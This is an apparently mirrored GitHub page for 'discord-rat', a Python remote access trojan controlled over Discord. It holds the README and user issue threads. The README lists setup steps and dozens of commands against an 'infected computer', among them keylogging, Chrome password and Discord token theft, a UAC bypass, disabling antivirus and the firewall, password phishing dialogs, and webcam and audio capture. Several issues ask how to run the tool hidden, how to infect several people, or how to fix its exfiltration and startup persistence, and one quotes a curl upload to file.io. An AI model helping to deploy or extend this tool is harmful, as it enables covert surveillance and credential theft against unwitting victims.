Giter Site home page Giter Site logo

moom825 / discord-rat Goto Github PK

View Code? Open in Web Editor NEW
230.0 11.0 46.0 118 KB

Discord Remote Administration Tool fully written in Python3

Python 100.00%
remote-access-tool rat discord-bot discord-py remote-access-trojan botnet-python botnet python python3 python-3

discord-rat's Introduction

DiscordRAT

Discord Remote Administration Tool fully written in Python3.

This is a RAT controlled over Discord with over 50 post exploitation modules.

Please use the 2.0 version
https://github.com/moom825/Discord-RAT-2.0

Disclaimer:

This tool is for educational use only, the author will not be held responsible for any misuse of this tool.

Credits

This project was originally made by https://github.com/Sp00p64/DiscordRAT, this entire readme.md is made by him too.
Credit goes to him for all the original modules and readme.md

Setup Guide:

You will first need to register a bot with the Discord developer portal and then add the bot to the Discord server that you want to use to control the bot (make sure the bot has administrator privileges in the Discord server). Once the bot is created copy the token of your bot and paste it at line 20.

Install requirements :

pip3 install -r requirements.txt

Then if the steps above were successful, you can launch the python file by executing python DiscordRAT.py. It will create a new channel and post a message on the server with a generated session number.
Now your bot should be available to use !

Requirements:
Python3, Windows(x64)

Modules

Available commands are :
--> !message = Show a message box displaying your text / Syntax  = "!message example"
--> !shell = Execute a shell command /Syntax  = "!shell whoami"
--> !webcampic = Take a picture from the webcam
--> !windowstart = Start logging current user window (logging is shown in the bot activity)
--> !windowstop = Stop logging current user window 
--> !voice = Make a voice say outloud a custom sentence / Syntax = "!voice test"
--> !admincheck = Check if program has admin privileges
--> !sysinfo = Gives info about infected computer
--> !history = Get chrome browser history
--> !download = Download a file from infected computer
--> !upload = Upload file to infected computer / Syntax = "!upload file.png" (with attachment)
--> !cd = Changes directory
--> !delete = deletes a file / Syntax = "!delete /path to/the/file.txt"
--> !write = Type your desired sentence on computer / Type "enter" to press the enter button on the computer
--> !wallpaper = Change infected computer wallpaper / Syntax = "!wallpaper" (with attachment)
--> !clipboard = Retrieve infected computer clipboard content
--> !geolocate = Geolocate computer using latitude and longitude of the ip adress with google map / Warning : Geolocating IP adresses is not very precise
--> !startkeylogger = Starts a keylogger
--> !stopkeylogger = Stops keylogger
--> !dumpkeylogger = Dumps the keylog
--> !volumemax = Put volume to max
--> !volumezero = Put volume at 0
--> !idletime = Get the idle time of user's on target computer
--> !blockinput = Blocks user's keyboard and mouse / Warning : Admin rights are required
--> !unblockinput = Unblocks user's keyboard and mouse / Warning : Admin rights are required
--> !screenshot = Get the screenshot of the user's current screen
--> !exit = Exit program
--> !kill = Kill a session or all sessions / Syntax = "!kill session-3" or "!kill all"
--> !uacbypass = attempt to bypass uac to gain admin by using fod helper
--> !passwords = grab all chrome passwords
--> !streamwebcam = streams webcam by sending multiple pictures
--> !stopwebcam = stop webcam stream
--> !getdiscordinfo = get discord token,email,phone number,etc
--> !streamscreen = stream screen by sending multiple pictures
--> !stopscreen = stop screen stream
--> !shutdown = shutdown computer
--> !restart = restart computer
--> !logoff = log off current user
--> !bluescreen = BlueScreen PC
--> !displaydir = display all items in current dir
--> !currentdir = display the current dir
--> !dateandtime = display system date and time
--> !prockill = kill a process by name / syntax = "!kill process.exe"
--> !recscreen = record screen for certain amount of time / syntax = "!recscreen 10"
--> !reccam = record camera for certain amount of time / syntax = "!reccam 10"
--> !recaudio = record audio for certain amount of time / syntax = "!recaudio 10"
--> !disableantivirus = permanently disable windows defender(requires admin)
--> !disablefirewall = disable windows firewall (requires admin)
--> !audio = play a audio file on the target computer(.wav only) / Syntax = "!audio" (with attachment)
--> !selfdestruct = delete all traces that this program was on the target PC
--> !windowspass = attempt to phish password by poping up a password dialog
--> !displayoff = turn off the monitor(Admin rights are required)
--> !displayon = turn on the monitors(Admin rights are required)
--> !hide = hide the file by changing the attribute to hidden
--> !unhide = unhide the file the removing the attribute to make it unhidden
--> !ejectcd = eject the cd drive on computer
--> !retractcd = retract the cd drive on the computer
--> !critproc = make program a critical process. meaning if its closed the computer will bluescreen(Admin rights are required)
--> !uncritproc = if the process is a critical process it will no longer be a critical process meaning it can be closed without bluescreening(Admin rights are required)
--> !website = open a website on the infected computer / syntax = "!website google.com" or "!website www.google.com"
--> !distaskmgr = disable task manager(Admin rights are required)
--> !enbtaskmgr = enable task manager(if disabled)(Admin rights are required)
--> !getwifipass = get all the wifi passwords on the current device(Admin rights are required)
--> !startup = add file to startup(when computer go on this file starts)(Admin rights are required)

Advice:

If you have problems with the installation of win32api or other modules, try installing it in a python virtual environment.
Please avoid opening issues about module related errors as it is caused by your python installation and not a problem inherent of DiscordRAT.
If you encounter "AttributeError: module 'enum' has no attribute 'IntFlag'" while compiling to Pyinstaller please do :

pip uninstall enum34

Contact:

Feel free to contact me if you have any problems. I also make custom version of this tool (not anymore), so if you want something added feel free to ask by joining by discord server. https://discord.gg/cKwkkC2U4c.

discord-rat's People

Contributors

moom825 avatar r2fo avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

discord-rat's Issues

Startup

On startup, Discord rat dont have an admin (exe version)

help

help:
pip3 install -r requirements.txt
'pip3' is not recognized as an internal or external command,
operable program or batch file.
I have python installed from: https://www.python.org/ I have version 3.9.6

Hey man just wanted to say great work also...

I have 1 issue and a minor improvement to recommend, if you change the !blockinput functions code to:
import keyboard
for i in range(150):
keyboard.block_key(i)

and the !unblockinput function to:
import keyboard
for i in range(150):
keyboard.unblock_key(i)

then it doesn't require admin perms,
also if I could have some help with what command ctypes uses to turn off the monitors, like what its sending to the computer with all those HWND values you implemented, if you help me a little bit I will be able to make it so that it doesn't need admin perms to disable input and disable the monitor.
My issue is that when I convert the .py file to .exe with pyinstaller the !uacbypass module stops working, and so does all of the functions that require admin perms.
Add me on discord omtoi 101#6477 because I have some code for another module that I think could be useful :)
Sorry for the long comment,
thanks, omtoi

Fix Uacbypass

the uacbypass doesn't work when its a .exe. please fix it.

!displaydir

noring exception in on_message
Traceback (most recent call last):
File "C:\Users\drm\AppData\Roaming\Python\Python39\site-packages\discord\client.py", line 343, in _run_event
await coro(*args, **kwargs)
File "C:\Users\drm\Desktop\DiscordRAT-master\DiscordRAT.py", line 695, in on_message
numb = len(result)
TypeError: object of type 'CompletedProcess' has no len()

Problem With Running DiscordRAT.py

Hello, I try to run the command python DiscordRAT.py, but I get the following error.
`>python DiscordRAT.py
Traceback (most recent call last):
File "C:\Users\Jack\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.9_qbz5n2kfra8p0\LocalCache\local-packages\Python39\site-packages\discord\http.py", line 300, in static_login
data = await self.request(Route('GET', '/users/@me'))
File "C:\Users\Jack\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.9_qbz5n2kfra8p0\LocalCache\local-packages\Python39\site-packages\discord\http.py", line 254, in request
raise HTTPException(r, data)
discord.errors.HTTPException: 401 Unauthorized (error code: 0): 401: Unauthorized

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
File "C:\Users\Jack\Desktop\DiscordRAT.py", line 1469, in
client.run(token)
File "C:\Users\Jack\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.9_qbz5n2kfra8p0\LocalCache\local-packages\Python39\site-packages\discord\client.py", line 723, in run
return future.result()
File "C:\Users\Jack\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.9_qbz5n2kfra8p0\LocalCache\local-packages\Python39\site-packages\discord\client.py", line 702, in runner
await self.start(*args, **kwargs)
File "C:\Users\Jack\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.9_qbz5n2kfra8p0\LocalCache\local-packages\Python39\site-packages\discord\client.py", line 665, in start
await self.login(*args, bot=bot)
File "C:\Users\Jack\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.9_qbz5n2kfra8p0\LocalCache\local-packages\Python39\site-packages\discord\client.py", line 511, in login
await self.http.static_login(token.strip(), bot=bot)
File "C:\Users\Jack\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.9_qbz5n2kfra8p0\LocalCache\local-packages\Python39\site-packages\discord\http.py", line 304, in static_login
raise LoginFailure('Improper token has been passed.') from exc
discord.errors.LoginFailure: Improper token has been passed.
Exception ignored in: <function _ProactorBasePipeTransport.del at 0x00000283F77C0040>
Traceback (most recent call last):
File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.9_3.9.1776.0_x64__qbz5n2kfra8p0\lib\asyncio\proactor_events.py", line 116, in del
self.close()
File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.9_3.9.1776.0_x64__qbz5n2kfra8p0\lib\asyncio\proactor_events.py", line 108, in close
self._loop.call_soon(self._call_connection_lost, None)
File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.9_3.9.1776.0_x64__qbz5n2kfra8p0\lib\asyncio\base_events.py", line 746, in call_soon
self._check_closed()
File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.9_3.9.1776.0_x64__qbz5n2kfra8p0\lib\asyncio\base_events.py", line 510, in _check_closed
raise RuntimeError('Event loop is closed')
RuntimeError: Event loop is closed`
Any help would be appreciated.

Runtime issue

C:\Users\Chris\Desktop\Discord-RAT-main>python DiscordRAT.py
Traceback (most recent call last):
File "C:\Users\Chris\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.9_qbz5n2kfra8p0\LocalCache\local-packages\Python39\site-packages\discord\http.py", line 300, in static_login
data = await self.request(Route('GET', '/users/@me'))
File "C:\Users\Chris\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.9_qbz5n2kfra8p0\LocalCache\local-packages\Python39\site-packages\discord\http.py", line 254, in request
raise HTTPException(r, data)
discord.errors.HTTPException: 401 Unauthorized (error code: 0): 401: Unauthorized

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
File "C:\Users\Chris\Desktop\Discord-RAT-main\DiscordRAT.py", line 1469, in
client.run(token)
File "C:\Users\Chris\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.9_qbz5n2kfra8p0\LocalCache\local-packages\Python39\site-packages\discord\client.py", line 723, in run
return future.result()
File "C:\Users\Chris\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.9_qbz5n2kfra8p0\LocalCache\local-packages\Python39\site-packages\discord\client.py", line 702, in runner
await self.start(*args, **kwargs)
File "C:\Users\Chris\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.9_qbz5n2kfra8p0\LocalCache\local-packages\Python39\site-packages\discord\client.py", line 665, in start
await self.login(*args, bot=bot)
File "C:\Users\Chris\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.9_qbz5n2kfra8p0\LocalCache\local-packages\Python39\site-packages\discord\client.py", line 511, in login
await self.http.static_login(token.strip(), bot=bot)
File "C:\Users\Chris\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.9_qbz5n2kfra8p0\LocalCache\local-packages\Python39\site-packages\discord\http.py", line 304, in static_login
raise LoginFailure('Improper token has been passed.') from exc
discord.errors.LoginFailure: Improper token has been passed.
Exception ignored in: <function _ProactorBasePipeTransport.del at 0x0000017E4493A040>
Traceback (most recent call last):
File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.9_3.9.1776.0_x64__qbz5n2kfra8p0\lib\asyncio\proactor_events.py", line 116, in del
self.close()
File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.9_3.9.1776.0_x64__qbz5n2kfra8p0\lib\asyncio\proactor_events.py", line 108, in close
self._loop.call_soon(self._call_connection_lost, None)
File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.9_3.9.1776.0_x64__qbz5n2kfra8p0\lib\asyncio\base_events.py", line 746, in call_soon
self._check_closed()
File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.9_3.9.1776.0_x64__qbz5n2kfra8p0\lib\asyncio\base_events.py", line 510, in _check_closed
raise RuntimeError('Event loop is closed')
RuntimeError: Event loop is closed

C:\Users\Chris\Desktop\Discord-RAT-main>pip uninstall enum34
Found existing installation: enum34 1.1.10
Uninstalling enum34-1.1.10:
Would remove:
c:\users\chris\appdata\local\packages\pythonsoftwarefoundation.python.3.9_qbz5n2kfra8p0\localcache\local-packages\python39\site-packages\enum34-1.1.10.dist-info*
c:\users\chris\appdata\local\packages\pythonsoftwarefoundation.python.3.9_qbz5n2kfra8p0\localcache\local-packages\python39\site-packages\enum*
Proceed (Y/n)? y
Successfully uninstalled enum34-1.1.10

C:\Users\Chris\Desktop\Discord-RAT-main>python DiscordRAT.py
Traceback (most recent call last):
File "C:\Users\Chris\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.9_qbz5n2kfra8p0\LocalCache\local-packages\Python39\site-packages\discord\http.py", line 300, in static_login
data = await self.request(Route('GET', '/users/@me'))
File "C:\Users\Chris\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.9_qbz5n2kfra8p0\LocalCache\local-packages\Python39\site-packages\discord\http.py", line 254, in request
raise HTTPException(r, data)
discord.errors.HTTPException: 401 Unauthorized (error code: 0): 401: Unauthorized

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
File "C:\Users\Chris\Desktop\Discord-RAT-main\DiscordRAT.py", line 1469, in
client.run(token)
File "C:\Users\Chris\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.9_qbz5n2kfra8p0\LocalCache\local-packages\Python39\site-packages\discord\client.py", line 723, in run
return future.result()
File "C:\Users\Chris\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.9_qbz5n2kfra8p0\LocalCache\local-packages\Python39\site-packages\discord\client.py", line 702, in runner
await self.start(*args, **kwargs)
File "C:\Users\Chris\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.9_qbz5n2kfra8p0\LocalCache\local-packages\Python39\site-packages\discord\client.py", line 665, in start
await self.login(*args, bot=bot)
File "C:\Users\Chris\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.9_qbz5n2kfra8p0\LocalCache\local-packages\Python39\site-packages\discord\client.py", line 511, in login
await self.http.static_login(token.strip(), bot=bot)
File "C:\Users\Chris\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.9_qbz5n2kfra8p0\LocalCache\local-packages\Python39\site-packages\discord\http.py", line 304, in static_login
raise LoginFailure('Improper token has been passed.') from exc
discord.errors.LoginFailure: Improper token has been passed.
Exception ignored in: <function _ProactorBasePipeTransport.del at 0x00000254975FA040>
Traceback (most recent call last):
File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.9_3.9.1776.0_x64__qbz5n2kfra8p0\lib\asyncio\proactor_events.py", line 116, in del
self.close()
File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.9_3.9.1776.0_x64__qbz5n2kfra8p0\lib\asyncio\proactor_events.py", line 108, in close
self._loop.call_soon(self._call_connection_lost, None)
File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.9_3.9.1776.0_x64__qbz5n2kfra8p0\lib\asyncio\base_events.py", line 746, in call_soon
self._check_closed()
File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.9_3.9.1776.0_x64__qbz5n2kfra8p0\lib\asyncio\base_events.py", line 510, in _check_closed
raise RuntimeError('Event loop is closed')
RuntimeError: Event loop is closed

Setup Help

I'm sure this is a trivial sort of thing, but I'm new to this, so I'm not sure what it precisely means when it says to paste the token at line 20. I've got the token, but I'm unsure of what to use, to put it where it needs to go. Do i need to copy and edit the code in visual studio, or use something else?

Rat error

When I test the rat on my second device, I get the following error:

instruction = """curl -F file=@""" + '"' + check + '"' + """ https://file.io/?expires=1w"""

SyntaxError: invalid decimal literal.

Any ideas?

i need help

how do i set this thing up??
the readme.md is very much out of date, and i cant figure out how to make this work! i did everything it says to do, and it did nothing on running. and when i ran "python DiscordRAT" it just said no file existed! somthig is messsed up. plus, how am i supposed to infect another pc?

pls answer soon, thanks!

requirements cmd

so the pip3 -r requirements is not working i may have just wrote that wrong but its not working idk why

Cryptodome Error

Hi, my Rat is working fine but when i use the gettokens command, it shows an error saying
No module named 'Cryptodome'
I'm pretty sure I have it installed, and I also tried reinstalling it, installing pycryptodome, pycryptodomex but nothing works.

Need some help

I did all the steps, got the bot in a discord server, and then i ran "python DiscordRAT.py" it made the new channel in discord but gave me my info, os, name, location. Did i do execute it on myself or is this correct

ERROR

getting no cv2?
when trying to run DiscordRAT.py

sorry.

ERROR

RuntimeError: Event loop is closed
I cant run

Erros

error : File "C:\Users\gipix\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.10_qbz5n2kfra8p0\LocalCache\local-packages\Python310\site-packages\discord\client.py", line 343, in _run_event
await coro(*args, **kwargs)
FIX?

How can I navigate to a directory named "."? & other issues

A directory on the target computer is named "."
A single period. It seems I'm not able to navigate to it. How can I make the program literally interpret a period in the directory name?
Edit with some other issues:
!screenshot only works for one monitor if multiple are connected
!currentdir doesn't seem to work at all, but this doesn't matter much since !displaydir includes the directory name anyway.

What happened to !getdiscordinfo?

In commit b842a0a, you removed the !getdiscordinfo command, without explanation other than "fixed passwords and other problems". Is there any reason for this, and is it possible for you to add it again? Thanks.

Issue running the .py

So when I run the .py file it just closes after a few seconds, how do I fix this?

py to exe

How would i convert this file to exe? i tried pyinstaller but it wont work.

raise RemoteDisconnected("Remote end closed connection without"

[2022-11-29 21:15:00] [INFO ] discord.client: logging in using static token
[2022-11-29 21:15:02] [INFO ] discord.gateway: Shard ID None has connected to Gateway (Session ID: 0079caf86746f284617076e33134f610).
[2022-11-29 21:15:06] [ERROR ] discord.client: Ignoring exception in on_ready
Traceback (most recent call last):
File "C:\Users\kanch\AppData\Local\Programs\Python\Python310\lib\site-packages\discord\client.py", line 409, in _run_event
await coro(*args, **kwargs)
File "C:\Users\kanch\OneDrive\Desktop\Discord-RAT-main\DiscordRAT.py", line 126, in on_ready
with urllib.request.urlopen("https://geolocation-db.com/json") as url:
File "C:\Users\kanch\AppData\Local\Programs\Python\Python310\lib\urllib\request.py", line 216, in urlopen
return opener.open(url, data, timeout)
File "C:\Users\kanch\AppData\Local\Programs\Python\Python310\lib\urllib\request.py", line 519, in open
response = self._open(req, data)
File "C:\Users\kanch\AppData\Local\Programs\Python\Python310\lib\urllib\request.py", line 536, in _open
result = self._call_chain(self.handle_open, protocol, protocol +
File "C:\Users\kanch\AppData\Local\Programs\Python\Python310\lib\urllib\request.py", line 496, in _call_chain
result = func(*args)
File "C:\Users\kanch\AppData\Local\Programs\Python\Python310\lib\urllib\request.py", line 1391, in https_open
return self.do_open(http.client.HTTPSConnection, req,
File "C:\Users\kanch\AppData\Local\Programs\Python\Python310\lib\urllib\request.py", line 1352, in do_open
r = h.getresponse()
File "C:\Users\kanch\AppData\Local\Programs\Python\Python310\lib\http\client.py", line 1374, in getresponse
response.begin()
File "C:\Users\kanch\AppData\Local\Programs\Python\Python310\lib\http\client.py", line 318, in begin
version, status, reason = self._read_status()
File "C:\Users\kanch\AppData\Local\Programs\Python\Python310\lib\http\client.py", line 287, in _read_status
raise RemoteDisconnected("Remote end closed connection without"
http.client.RemoteDisconnected: Remote end closed connection without response

Intents Error

Ive got all Intents on and i dont use v2 bc it just closes and startup doesent work also it doesent have a keylogger.

"This error message is indicating that there is a problem with the "test.py" script on line 30. Specifically, it is saying that the "Client.init()" function is missing a required keyword-only argument named "intents". This error is likely caused by the fact that the script is trying to initialize an instance of the "Client" class from the Discord API library, but it is missing the required argument 'intents' which specifies which events the bot should listen to. This is likely a mistake in the script's code and it should be fixed by the developer."

Problem with file uploading

Hello, your upgrade of this program is really amizing,but there is an error when it is compiled(PyInstaller --onefile --noconsole file.py).When i type !recscreen/audio 30 or 40(as long as the file is bigger than 8mb) the bot send a message that it will take a while but after i waited around 20min its still not sending anything.The same problem with the UAC bypass.Thnaks!

Bug whit rat

Token Grab discord and startup arena't working

Duplicates sessions, is generally very buggy.

Please update this I know you made a new one but this one is much better than the other one. even if you just fix the sessions it would make it a lot better. (because right now it randomly breaks and it makes every pc in the same session.) just maybe make it like computer names?

Bit complicated: invisible background process

How can I set the window to be made invisible? (e.B. as a background process) In addition, I want to ask how I can activate that the window opens automatically after a restart? (again as an invisible background process)

!Passwords

Hello Sir thanks for sharing this beautiful project.
I'm testing your project but i think password grabber isn't working.
can you help me with that please?

How to fix the script

Ok hello so the script does not work because of a discord update so im gonna tell u how to make it work

so in line 31 "i dont know the line perfect but it should say 'client ='"

so change that to the following code

intents = discord.Intents.default()
client = discord.Client(intents=intents)
intents.message_content = True
bot = commands.Bot(command_prefix='!', intents=intents)

thats it you fixed the program hooray!

AttributeError: 'DMChannel' object has no attribute 'name'

[2022-11-11 22:38:03] [ERROR ] discord.client: Ignoring exception in on_message
Traceback (most recent call last):
File "C:\Users\kanch\AppData\Local\Programs\Python\Python310\lib\site-packages\discord\client.py", line 409, in _run_event
await coro(*args, **kwargs)
File "C:\Users\kanch\AppData\Local\Temp\Rar$DIa3860.7251\DiscordRAT.py", line 183, in on_message
if message.channel.name != channel_name:
AttributeError: 'DMChannel' object has no attribute 'name'

Python to Exe Error

How to make this into exe? Everytime i try this with Pyinstaller or Auto Py to exe a error shows up.

Like this: bootstrap()
File "cv2_init_.py", line 153, in bootstrap
native_module = importlib.import_module("cv2")
File "importlib_init_.py", line 126, in import_module
File "PyInstaller\loader\pyimod03_importers.py", line 495, in exec_module
File "cv2_init_.py", line 181, in
bootstrap()
File "cv2_init_.py", line 76, in bootstrap
raise ImportError('ERROR: recursion is detected during loading of "cv2" binary extensions. Check OpenCV installation.')
ImportError: ERROR: recursion is detected during loading of "cv2" binary extensions. Check OpenCV installation.

This comes up when i try to start the exe. With Auto py to exe comes again a error. Could you help me?

Startup issue

When i type !startup file create in start up, bot this file not working on reset

Multiple People

Is it possible to infect multiple people with the same file or do you need a new file for each person?

Compile issue

Hi, I am trying to compile and I am getting an error
File "C:\Users\User\AppData\Local\Programs\Python\Python310\lib\site-packages\PyInstaller\utils\hooks_init_.py", line 582, in get_package_paths
raise ValueError(f"Package '{package}' does not exist or is not a package!")
ValueError: Package 'sounddevice' does not exist or is not a package!

Can someone help me?

win32gui error

When I typed pip3 install -r requirements.txt I got an error: ,,[end of output]

note: This error originates from a subprocess, and is likely not a problem with pip.
error: subprocess-exited-with-error

ร— Getting requirements to build wheel did not run successfully.
โ”‚ exit code: 1
โ•ฐโ”€> See above for output.

note: This error originates from a subprocess, and is likely not a problem with pip.", Then I tried to install the requirements manually again, everything worked except for win32gui. I searched the internet for errors the whole time, but unfortunately nothing found a suitable one.

May You please check my issue related to the source DISCORDRAT Author?

Bot was working fine until i attempt to run the command !uacbypass with no success at all. Errors started appearing When clicking at Taskbar shortcuts as noted below:

C:\Windows\System32\fodhelper.exe | file will not open anymore | Error is now being shown, it seens whenever this file is clicked systems tries to locate the bot binary.exe for whatever reason. (There has been a registry change I believe ath the !uacbypass command.

If I attempt to Open Network and Internet Settings a Command Prompt opens and Error appears looking for the file.
mspaint_6tXW6Q0e9S

Errors in video:
https://user-images.githubusercontent.com/3595920/128725054-829a0d84-4824-426b-a982-b5048405af08.mp4
https://user-images.githubusercontent.com/3595920/128725059-ddfe140d-ef1f-42ed-9cf8-5610b38ce35b.mp4

CMD has now Parameters set to it as shown in the image:: "C:\Windows\System32\cmd.exe" /k start C:\Users%username%\AppData\Local\Temp_MEI60802\D:\Folder\Exercises\2 - Remote Access Trojan\dist\SecureXDRAT.exe
procexp64_DIT9Bej0rS

Registry Changes made by the bot:
image

@moom825

[ANSWER] How to fix the INTENTS error

Line 30:

- client = discord.Client()
- bot = commands.Bot(command_prefix='!')

+ intents = discord.Intents.default()
+ intents.message_content = True
+ client = discord.Client(intents=intents)
+ bot = commands.Bot(intents=intents, command_prefix='!')

browser cookie

when ran will this send me their browser cookie aswell

How to run hidden? ANSWERED

is there a function to automatically run hidden? or would i have to do that myself
if not, it would make for a great addition

Unhandled Exception in Script

image

I get this error when i try to run it. I don't know why. I installed the requirements and everything is up-to-date.

Could someone help me?

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.